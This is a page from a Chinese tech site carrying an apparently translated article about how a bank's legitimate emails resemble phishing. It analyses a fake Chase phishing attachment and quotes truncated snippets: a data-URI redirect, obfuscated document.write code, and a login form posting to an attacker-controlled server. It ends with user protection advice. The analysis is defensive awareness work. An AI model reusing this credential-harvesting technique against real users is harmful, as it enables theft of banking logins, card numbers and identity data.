- 13星galaxy s7機身尺寸是多少 3星s7機身尺寸介紹
- 23星galaxy s7edge機身尺寸是多少 3星s7edge機身尺寸介紹
- 3lumia950xl與3星galaxy s6edge+相機比較視頻
- 4華為暢享5s與榮耀暢玩5x哪一個好 華為榮耀暢玩5x與暢享5s比較
- 5華為暢享5s與樂視1s哪一個好 樂視超級手機1s與華為暢享5s比較
- 6華為暢享5s與榮耀6哪一個好 華為榮耀6與華為暢享5s比較
- 7華為暢享5s與榮耀7哪一個好 華為榮耀7與華為暢享5s比較
- 8華為暢享5s與榮耀4c哪一個好 華為榮耀4c與華為暢享5s比較
- 9oppo r7plus與小米note頂配哪一個好
- 10oppo r7plus好還是華為mate7好 華為mate7與oppo r7plus比較
- 11oppo r7plus與oppo r7的區別 oppo r7與oppo r7plus比較
- 12華為mate8與oppo r7plus比較 oppo r7plus好還是華為mate8好
[摘要]當我第一次收到銀行發來的“安全”郵件時, 我第一反應就是這里是否有詐?因為在我看來, 它實在是太像釣魚郵件了。 這封躺在收件箱里的郵件來源于我銀行經理的個人...
當我第一次收到銀行發來的“安全”郵件時, 我第一反應就是這里是否有詐?因為在我看來, 它實在是太像釣魚郵件了。 這封躺在收件箱里的郵件來源于我銀行經理的個人郵箱地址, 而非Chase銀行的官方郵箱。 郵件中不僅附帶有一個HTML頁面, 而且還有文字告訴我“在瀏覽器中打開這個頁面以了解如何進行下一步操作”, 這一切瞬間讓我提高了警惕。
首先, 本身電子郵件這個東西就是不安全的, 更何況是我的銀行還發送了一封帶有附件的“安全”郵件給我。 這看起來就像是一次教科書般的釣魚攻擊, 所以我趕緊拿起電話直接打給了我的銀行經理。
“不是的, 這是合法郵件。 我需要你將它打印出來, 然后簽署一些文件。 ”這就是銀行經理給我的回答。
但我說到:“首先, 郵件發送人的地址看起來就非常可疑, 而且這種郵件不僅要讓我點擊外部鏈接并打開附件, 而且還要我在Web表單中填寫我的個人信息, 這誰會信啊?”
銀行經理說到:“我完全理解, 這確實會讓人懷疑。 但這封郵件沒有任何問題, 我的確發過這封郵件給你, 如果需要的話我還可以再發一次。 ”
于是乎, 他果然又發了一封給我。 這封重發的郵件看起來與之前那封完全一樣, 但這一次我正在與我的銀行經理通話, 所以我按照要求打開了附件。 郵件中有一個“點擊讀取信息”的按鈕, 點擊之后將我重定向到了Chase銀行的安全郵件門戶網站。 但是整個過程讓我感到非常的奇葩, 我也將我擔心的地方告訴了我的銀行經理、他的上司、以及Chase的客戶支持部門。
值得一提的是, 我們是不可能完完全全地對客戶的行為進行安全培訓的, 而銀行所采用的交互方式與釣魚攻擊幾乎沒有區別, 這就非常危險了。
攻擊分析
近期, 我收到了一封真正的釣魚郵件。 這封郵件來自chase.online@chasee.com, 它很明顯是封偽造的郵件, 但如果不仔細的話還是看不出什么端倪的。 這封郵件聲稱我的銀行賬號近期出現了很多錯誤操作, 并且跟之前那封真實的郵件一樣, 它也讓我在瀏覽器中打開附件HTML文件并按提示進行操作。
但很明顯我不會按它說的做!于是, 我把HTML文件下載了下來, 然后把它拖到了代碼審查窗口中。 我發現, 除了正常的HTML代碼之外, 文件中還包含一段腳本代碼:
window.location="data:text/html;,PCFET0NUWVBFIEhUTUwg...
這個頁面會在地址欄中顯示一大堆編碼的數據, 代碼本身包含有Chase銀行官網的腳本、圖片以及指向合法頁面的鏈接, 整個頁面看起來和正常的Chase銀行登錄頁面沒什么區別。 但是, 代碼中還包含有其他的腳本代碼(經過混淆), 這些代碼會在登錄頁面中添加一個自定義的表單:
document.write(unescape('%3C%66%6F%72...
在對代碼進行了反混淆之后, 我發現所有的代碼都與Chase銀行的真實登錄頁面一致, 只不過表單action屬性指向的是攻擊者所控制的服務器。
<form action="http://191..."class="button" method="post" name="submit"id="submit">
如果不知情的用戶真的在瀏覽器中打開了這個頁面, 那么他們將會看到一個帶有Chase商標的頁面讓他們確認以下信息:
1. 賬號登錄信息
2. 聯系信息
3. 銀行卡信息
4. 社保號和駕駛證信息等等
上述所有的這些信息都不會提交給Chase, 而是提交給了攻擊者自己的服務器。 這臺由攻擊者控制的服務器在成功獲取到了這些數據之后, 會將用戶重定向到Chase的在線登錄頁面, 所以這會讓用戶完全無法察覺到異常。 我認為, 之所以用戶會這樣做, 完全是因為Chase平時對用戶的“訓練”所導致的(通過郵件附件要求用戶提供身份驗證信息)。
如何保護自己
除非Chase銀行不再通過這種帶有附件HTML的郵件來要求用戶登錄并填寫自己的信息, 否則廣大Chase銀行的客戶還是免不了遭受釣魚攻擊。 但是, 我們仍然有很多方法可以避免自己落入這種網絡釣魚陷阱之中。
首先, 千萬不要直接打開郵件中的附件網頁, 除非你能夠百分之百確定這封郵件沒有任何問題。 其次, 永遠不要輕易在任何網頁中填寫自己的個人信息。 第三, 如果郵件要求你提供個人信息, 而你也不得不這樣做的話, 請直接訪問在線服務的官方網站去填寫, 千萬不要圖方便直接點擊郵件中的地址。 這些方法同樣適用于電話釣魚。 永遠不要輕易在電話中給出自己的個人信息, 除非那個電話是你打過去的。
最后, 請你不要嫌麻煩, 一定要將所有不正常的情況上報給自己的服務商。 當你遇到了勒索郵件或有人嘗試通過電話來竊取你的信息時, 請一定要即使報告。
總結
實際上, 如果想要保護用戶不受網路釣魚攻擊的侵害, 僅僅依靠提高用戶安全意識還是遠遠不夠的, 這個過程中廠商也要負起一定的責任。 所謂心中無鬼, 天下無鬼。 很多廠商知道這封郵件是他們自己發的, 就不會太在意去證明郵件的安全性與合法性, 但對于用戶來說, 當他們習慣了這樣的交互方式時, 也就給了釣魚攻擊者可乘之機。
上面是電腦上網安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。
標簽:為啥釣魚攻擊總能成功
推薦資訊 總人氣榜
最新教程 本月人氣
- 1Intel回應最新安全漏洞:未來幾周內修好
- 2Intel處理器又雙叒叕曝漏洞:二代酷睿起全受影響
- 3Intel怒飚5GHz 28核心!竟用上1770W壓縮機
- 4Intel 10nm暗藏神技能:主流首次支持AVX-512指令集
- 5Intel 10nm難產 AMD賺大:股價漲了 評級高了
- 6Intel下代發燒平臺Cascade Lake-X曝光
- 7AMD二代銳龍處理器獲3項大獎:Ryzen 7 2700X登年度CPU
- 8AMD EPYC霄龍歷史性突破:正式登陸亞馬遜AWS
- 9希捷公布機械硬盤容量路線圖:100TB都不是事兒
- 10對標英特爾 AMD基礎級處理器速龍200GE實測:表現贊
- 11單條最大512GB!Intel開始部署傲騰非易失性內存條
- 12AMD芯片總監單干 推出超過Intel的AI芯片
- 1華為p8與oppo r7plus比較評測 oppo r7plus好還是華為p8好
- 2華為mate8與oppo r7plus比較 oppo r7plus好還是華為mate8好
- 3oppo r7plus與oppo r7的區別 oppo r7與oppo r7plus比較
- 4oppo r7plus好還是華為mate7好 華為mate7與oppo r7plus比較
- 5oppo r7plus與小米note頂配哪一個好
- 6華為暢享5s與榮耀4c哪一個好 華為榮耀4c與華為暢享5s比較
- 7華為暢享5s與榮耀7哪一個好 華為榮耀7與華為暢享5s比較
- 8華為暢享5s與榮耀6哪一個好 華為榮耀6與華為暢享5s比較
- 9華為暢享5s與樂視1s哪一個好 樂視超級手機1s與華為暢享5s比較
- 10華為暢享5s與榮耀暢玩5x哪一個好 華為榮耀暢玩5x與暢享5s比較
- 11lumia950xl與3星galaxy s6edge+相機比較視頻
- 123星galaxy s7edge機身尺寸是多少 3星s7edge機身尺寸介紹
